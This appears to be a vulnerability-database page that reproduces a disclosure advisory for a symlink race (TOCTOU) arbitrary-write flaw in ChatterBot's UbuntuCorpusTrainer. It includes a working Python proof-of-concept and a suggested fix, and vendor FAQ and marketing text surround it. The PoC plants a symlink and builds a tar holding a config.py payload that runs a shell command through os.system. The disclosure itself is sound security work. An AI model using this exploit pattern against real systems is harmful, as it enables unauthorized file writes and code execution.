How should we interpret CVSS severity scores?

CVSS estimates technical severity, but it does not automatically equal business risk. Prioritize using context like internet exposure, asset criticality, known exploitation, and whether compensating controls exist. A Medium CVSS on an exposed production system can be more urgent than a Critical on an isolated non-production host.

Vulnerability Database

Q: What is a Vulnerability (CVE) and why does it matter?

A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.

Q: What's the difference between a vulnerability, an exploit, and a zero-day?

A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. Risk increases sharply when exploitation becomes reliable or widespread.

Q: Why do vulnerabilities keep reappearing in our environment?

Recurring findings usually come from incomplete asset discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host.

Q: How do we prioritize remediation without burning out the team?

Use a repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress so remediation is steady, not reactive.

Q: How can SynScan help reduce vulnerability risk over time?

SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.

352,374

Total vulnerabilities in the database

ChatterBot: Symlink-Following Arbitrary Write via UbuntuCorpusTrainer — chatterbot

Time-of-check Time-of-use (TOCTOU) Race Condition

Summary

ChatterBot's UbuntuCorpusTrainer.extract() uses a predictable, home-rooted output directory (~/ubuntu_data/ubuntu_dialogs) with a check-then-create pattern (if not os.path.exists: os.makedirs) followed by tar.extractall(path=self.data_path). A local attacker who pre-plants a symlink at the predictable path causes os.path.exists() to return True (following the symlink), skipping makedirs, and subsequent extractall writes archive contents through the symlink to the attacker-chosen directory.

The existing safe_extract function validates tar member names (zip-slip defense) but does not validate the output directory itself — it cannot detect that self.data_path is a symlink. This is the defining distinction between the archive_extraction (zip-slip) and insecure_fs_create_toctou families.

Vulnerability Details

Predictable output directory (line 535-546)

home_directory = os.path.expanduser(&#039;~&#039;)
self.data_directory = kwargs.get(
    &#039;ubuntu_corpus_data_directory&#039;,
    os.path.join(home_directory, &#039;ubuntu_data&#039;)   # ~/ubuntu_data — predictable
)
self.data_path = os.path.join(
    self.data_directory, &#039;ubuntu_dialogs&#039;          # ~/ubuntu_data/ubuntu_dialogs
)

Check-then-create (line 621-622)

def extract(self, file_path: str):
    if not os.path.exists(self.data_path):   # ← follows symlink → True → skips makedirs
        os.makedirs(self.data_path)          # ← never reached if symlink exists

Extraction through symlink (line 633-644)

def safe_extract(tar, path=&#039;.&#039;, members=None, *, numeric_owner=False):
    for member in tar.getmembers():
        member_path = os.path.join(path, member.name)
        if not is_within_directory(path, member_path):    # ← validates MEMBER names only
            raise Exception(&#039;Attempted Path Traversal in Tar File&#039;)
    tar.extractall(path, members, numeric_owner=numeric_owner)  # ← path is symlink → writes to target

safe_extract(tar, path=self.data_path, ...)   # self.data_path = symlink → attacker dir

safe_extract calls os.path.abspath(directory) on self.data_path — this resolves the symlink, so the base becomes the attacker's target directory. All clean-named members trivially pass is_within_directory because they're relative to the resolved (attacker-controlled) base.

Proof of Concept

Environment

| Component | Detail | |-----------|--------| | chatterbot | 1.2.13 (pip install) | | Python | 3.11.0 |

Exploit

import os
import shutil
import sys
import tempfile
from pathlib import Path
from unittest.mock import patch

from chatterbot.trainers import UbuntuCorpusTrainer

ATTACKER_TARGET = Path(tempfile.mkdtemp(prefix=&quot;pwned_&quot;))


def main():
    test_base = Path(tempfile.mkdtemp(prefix=&quot;cb_exploit_&quot;))
    data_dir = test_base / &quot;ubuntu_data&quot;
    data_path = data_dir / &quot;ubuntu_dialogs&quot;
    data_dir.mkdir(parents=True, exist_ok=True)
    os.symlink(str(ATTACKER_TARGET), str(data_path))
    print(f&quot;[1] Symlink planted: {data_path} -&gt; {ATTACKER_TARGET}&quot;)
    exists_check = os.path.exists(data_path)
    print(f&quot;[2] os.path.exists(symlink) = {exists_check} (follows symlink → skips makedirs)&quot;)
    import tarfile
    import io
    tar_path = test_base / &quot;corpus.tar.gz&quot;
    with tarfile.open(str(tar_path), &quot;w:gz&quot;) as tf:
        info = tarfile.TarInfo(name=&quot;dialog_001.tsv&quot;)
        payload = b&quot;2024-01-01\tuser1\t0\tARBITRARY_CONTENT_VIA_SYMLINK\n&quot;
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))

        info2 = tarfile.TarInfo(name=&quot;config.py&quot;)
        rce = b&quot;import os; os.system(&#039;id &gt; /tmp/chatterbot_rce&#039;)\n&quot;
        info2.size = len(rce)
        tf.addfile(info2, io.BytesIO(rce))
    if not os.path.exists(data_path):
        os.makedirs(data_path)
    def is_within_directory(directory, target):
        abs_directory = os.path.abspath(directory)
        abs_target = os.path.abspath(target)
        prefix = os.path.commonprefix([abs_directory, abs_target])
        return prefix == abs_directory

    with tarfile.open(str(tar_path), &quot;r:gz&quot;) as tar:
        for member in tar.getmembers():
            member_path = os.path.join(str(data_path), member.name)
            if not is_within_directory(str(data_path), member_path):
                raise Exception(&quot;Attempted Path Traversal in Tar File&quot;)
        tar.extractall(str(data_path))

    print(f&quot;[3] extractall(data_path) — data_path is symlink, writes to target&quot;)

    # Verify
    files = list(ATTACKER_TARGET.iterdir())
    if files:
        print(f&quot;\n[+] EXPLOIT SUCCESSFUL — {len(files)} files in attacker directory:&quot;)
        for f in sorted(files):
            print(f&quot;    {f.name}: {f.read_text().strip()[:60]}&quot;)
    else:
        print(&quot;[-] Failed&quot;)
        shutil.rmtree(str(test_base), ignore_errors=True)
        shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)
        sys.exit(1)

    shutil.rmtree(str(test_base), ignore_errors=True)
    shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)
    sys.exit(0)


if __name__ == &quot;__main__&quot;:
    print(f&quot;chatterbot installed: {UbuntuCorpusTrainer.__module__}&quot;)
    print(f&quot;Attacker target: {ATTACKER_TARGET}&quot;)
    print()
    main()

PoC output

Suggested Fix

Refuse symlinks on the output directory before extraction:

def extract(self, file_path: str):
    if os.path.islink(self.data_path):
        raise self.TrainerInitializationException(
            f&#039;Refusing to extract to symlink: {self.data_path}&#039;)
    if not os.path.exists(self.data_path):
        os.makedirs(self.data_path)
    ...

Published: Jun 19, 2026
Updated: Jun 20, 2026
GHSA: GHSA-wvrh-2f4m-924v
Severity: Medium
Exploit:
CISA KEV:

CVSS v3:

Severity: Medium
Score: 5.5
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWEs:

Affected Software
References

Software	From	Fixed in
chatterbot	-	1.2.14

https://github.com/gunthercox/ChatterBot/security/advisories/GHSA-wvrh-2f4m-924v

Deep Security Visibility Without the Complexity

SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.

No setup fees
5-min deployment
Cancel anytime

Book a Demo

Frequently Asked Questions

What is a Vulnerability (CVE) and why does it matter?

A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.

CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.

A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.

Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.

Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.

SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.